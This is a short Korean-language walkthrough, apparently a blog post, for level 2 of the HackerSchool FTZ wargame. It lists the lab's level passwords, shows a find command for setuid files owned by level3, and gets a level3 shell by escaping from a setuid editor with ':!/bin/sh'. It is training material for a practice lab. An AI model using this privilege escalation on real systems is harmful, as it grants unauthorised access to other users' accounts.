HackerSchool FTZ - 2

id:

level2

passwd:

hacker or cracker

 

 

 

 

ls -al

cat hint

힌트를 살펴보자

 

편집이 가능하고 실행이 가능하므로 4300

기존과 같이 level3의 권한을 사용할 수 있는것을 확인했다.

 

find / -user level3 -perm -4300

/usr/bin/editor 에서 level3의 권한을 사용할 수 있는 것을 확인함

 

또는

find / -user level3 -perm -4300 2 > /dev/null

/usr/bin/editor

 

파일 설명자설명

2 > /dev/null

표준 오류(진단) 출력

표준 오류 출력만 무시하는 경우

 

 

cd /usr/bin/

./editor

 

:!/bin/sh

에디터에서 쉘을 획득하기위해 실행한다.

 

level3 권한으로 쉘권한을 획득함

 

 

 

my-pass 

명령을 실행함.

 

level3의 패스워드를 확인가능했다

 

level3 passwd

can you fly?